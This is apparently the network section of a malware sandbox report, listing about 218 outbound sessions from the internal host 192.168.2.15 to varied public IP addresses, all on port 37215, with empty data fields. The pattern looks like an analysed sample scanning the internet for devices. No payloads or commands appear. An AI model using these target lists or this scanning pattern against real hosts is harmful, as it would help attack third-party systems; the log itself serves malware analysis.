                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12935192.168.2.153423445.77.228.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12936192.168.2.1556634122.90.143.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12937192.168.2.1549970186.49.67.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12938192.168.2.1533260190.243.35.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12939192.168.2.154043637.237.61.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12940192.168.2.153670237.0.153.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12941192.168.2.155741637.234.0.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12942192.168.2.155060445.97.104.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12943192.168.2.1538342222.214.88.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12944192.168.2.1536738102.8.26.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12945192.168.2.1548396122.30.7.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12946192.168.2.155129845.202.234.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12947192.168.2.154043094.5.26.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12948192.168.2.1541748190.56.243.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12949192.168.2.154270241.33.138.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12950192.168.2.1533356122.149.235.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12951192.168.2.1541314186.49.94.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12952192.168.2.1543042122.220.35.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12953192.168.2.155357041.180.68.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12954192.168.2.154002245.55.43.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12955192.168.2.1538214156.240.100.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12956192.168.2.1550274156.103.22.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12957192.168.2.154701694.58.238.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12958192.168.2.1534664122.55.210.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12959192.168.2.1555020102.156.160.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12960192.168.2.1547170138.220.135.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12961192.168.2.155778841.150.172.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12962192.168.2.1548202197.184.178.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12963192.168.2.1541170197.239.246.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12964192.168.2.1555752157.42.60.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12965192.168.2.1545910152.97.188.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12966192.168.2.1560710190.58.249.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12967192.168.2.156059094.112.254.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12968192.168.2.1547920157.84.206.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12969192.168.2.1534288157.64.238.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12970192.168.2.154202231.148.146.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12971192.168.2.1553392122.207.200.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12972192.168.2.1549756181.238.175.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12973192.168.2.1556682157.151.236.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12974192.168.2.1534210181.232.114.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12975192.168.2.153532494.11.19.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12976192.168.2.1553658197.37.11.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12977192.168.2.1539500156.40.223.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12978192.168.2.1543926138.203.97.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12979192.168.2.1537356122.242.15.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12980192.168.2.154729441.16.145.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12981192.168.2.155141231.146.34.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12982192.168.2.1533286222.17.43.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12983192.168.2.1532942197.169.157.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12984192.168.2.153833631.150.82.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12985192.168.2.155958431.192.27.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12986192.168.2.1532974190.0.167.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12987192.168.2.1555236181.62.122.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12988192.168.2.155092431.164.161.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12989192.168.2.1540154181.210.158.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12990192.168.2.1539698156.248.138.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12991192.168.2.153711494.92.242.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12992192.168.2.154569845.32.8.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12993192.168.2.1535650186.84.38.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12994192.168.2.1555492181.219.57.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12995192.168.2.1547072122.39.114.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12996192.168.2.154246431.89.120.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12997192.168.2.154330445.120.190.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12998192.168.2.154225894.56.37.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12999192.168.2.1543386190.131.9.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13000192.168.2.1535838138.9.108.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13001192.168.2.1548288197.218.4.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13002192.168.2.154797441.119.116.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13003192.168.2.1540582121.120.223.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13004192.168.2.154704637.22.244.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13005192.168.2.1536528222.29.44.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13006192.168.2.1554928157.73.76.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13007192.168.2.155060441.65.112.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13008192.168.2.154469037.160.132.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13009192.168.2.153784045.104.193.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13010192.168.2.1548078222.253.197.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13011192.168.2.1538478121.247.196.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13012192.168.2.1534656222.253.73.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13013192.168.2.1548456157.106.118.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13014192.168.2.1535732115.81.214.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13015192.168.2.1540952186.142.148.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13016192.168.2.1558920122.82.32.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13017192.168.2.153410631.77.65.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13018192.168.2.1533312138.162.159.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13019192.168.2.1543950197.183.69.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13020192.168.2.1552790138.192.90.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13021192.168.2.155801231.127.134.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13022192.168.2.1550848157.198.235.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13023192.168.2.153790441.248.20.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13024192.168.2.1549974222.183.66.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13025192.168.2.1549754102.68.72.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13026192.168.2.1533014161.216.108.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13027192.168.2.1558470190.31.11.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13028192.168.2.1547310197.222.223.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13029192.168.2.1544292156.187.183.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13030192.168.2.1543186197.86.7.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13031192.168.2.1543298186.136.100.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13032192.168.2.1553592156.195.217.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13033192.168.2.155471641.224.221.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13034192.168.2.1545494121.176.34.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13035192.168.2.155241041.17.95.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13036192.168.2.1556830156.170.34.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13037192.168.2.1547016117.67.71.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13038192.168.2.1556418190.171.142.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13039192.168.2.1549728186.41.253.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13040192.168.2.1534306156.60.142.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13041192.168.2.155321494.242.164.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13042192.168.2.1552724190.190.129.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13043192.168.2.154992231.15.18.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13044192.168.2.1545584111.48.45.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13045192.168.2.1534780186.117.237.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13046192.168.2.1548094156.245.208.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13047192.168.2.1533350156.174.86.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13048192.168.2.156060431.66.183.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13049192.168.2.1534558181.142.21.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13050192.168.2.154967094.27.59.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13051192.168.2.155472237.45.92.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13052192.168.2.154113045.170.255.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13053192.168.2.1554268122.85.250.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13054192.168.2.1560002190.252.202.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13055192.168.2.1543084181.16.16.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13056192.168.2.156005094.37.8.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13057192.168.2.1556670138.181.4.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13058192.168.2.1537994157.177.192.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13059192.168.2.155608294.95.27.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13060192.168.2.153455845.39.176.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13061192.168.2.1536702138.218.108.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13062192.168.2.1556180197.117.18.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13063192.168.2.1560834186.112.247.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13064192.168.2.153984638.242.87.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13065192.168.2.155317094.191.129.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13066192.168.2.1544560197.33.32.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13067192.168.2.155269831.139.248.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13068192.168.2.154427831.63.112.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13069192.168.2.155196237.80.38.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13070192.168.2.1540334190.123.8.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13071192.168.2.1544850156.114.228.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13072192.168.2.154993231.33.70.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13073192.168.2.153717031.83.70.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13074192.168.2.155063841.101.19.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13075192.168.2.154804037.184.218.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13076192.168.2.1537446102.213.13.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13077192.168.2.1537784157.91.203.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13078192.168.2.1549036122.158.254.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13079192.168.2.1541460156.241.174.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13080192.168.2.1559994197.186.212.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13081192.168.2.1543400222.64.8.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13082192.168.2.155332431.202.157.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13083192.168.2.1559612186.159.56.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13084192.168.2.1541230190.184.134.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13085192.168.2.153821445.221.180.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13086192.168.2.1554120222.67.224.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13087192.168.2.1548030181.186.6.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13088192.168.2.1550524181.24.135.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13089192.168.2.1559432157.179.95.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13090192.168.2.1555450121.244.138.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13091192.168.2.1551492197.189.47.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13092192.168.2.1542348157.109.37.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13093192.168.2.1537856197.164.133.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13094192.168.2.1550990121.198.100.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13095192.168.2.1556122157.27.239.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13096192.168.2.1556120157.248.74.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13097192.168.2.1555876190.51.220.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13098192.168.2.1551654197.197.83.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13099192.168.2.1552982222.47.170.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13100192.168.2.154105031.164.16.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13101192.168.2.1560722186.194.28.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13102192.168.2.154344837.164.76.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13103192.168.2.154224831.127.250.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13104192.168.2.1550562222.98.90.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13105192.168.2.1556574121.156.185.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13106192.168.2.1554534190.159.52.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13107192.168.2.1546370190.199.82.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13108192.168.2.1542912121.244.214.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13109192.168.2.1545560220.154.239.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13110192.168.2.155913431.246.39.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13111192.168.2.1534968121.53.103.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13112192.168.2.1543986181.156.43.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13113192.168.2.1533956121.84.122.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13114192.168.2.1536718156.231.117.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13115192.168.2.1541082122.58.132.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13116192.168.2.1537828138.103.127.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13117192.168.2.1558606157.209.5.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13118192.168.2.1556036157.22.111.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13119192.168.2.155633041.71.47.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13120192.168.2.1557318197.226.126.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13121192.168.2.153608641.77.46.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13122192.168.2.1560936221.28.114.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13123192.168.2.1542176156.71.73.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13124192.168.2.153989845.102.103.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13125192.168.2.1539900156.234.230.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13126192.168.2.1535530102.115.117.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13127192.168.2.1534208122.0.58.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13128192.168.2.154497245.121.221.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13129192.168.2.1543872121.19.242.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13130192.168.2.1542744197.17.185.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13131192.168.2.1536384181.142.249.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13132192.168.2.1555746186.191.93.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13133192.168.2.1532774156.113.30.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13134192.168.2.155244045.162.128.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13135192.168.2.1549220157.70.31.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13136192.168.2.1537406197.62.2.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13137192.168.2.156024245.155.81.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13138192.168.2.1549066197.137.152.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13139192.168.2.1558910138.202.209.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13140192.168.2.1550174102.176.118.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13141192.168.2.1537492122.53.179.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13142192.168.2.153643894.17.153.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13143192.168.2.154869499.240.179.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13144192.168.2.1560546122.66.165.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13145192.168.2.1540444186.160.179.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13146192.168.2.1559496121.34.162.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13147192.168.2.1538490190.189.236.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13148192.168.2.155326641.63.151.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13149192.168.2.1547112122.38.216.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13150192.168.2.1533234181.122.163.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13151192.168.2.154027837.239.92.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13152192.168.2.154111841.133.154.137215
                                              TimestampBytes transferredDirectionData


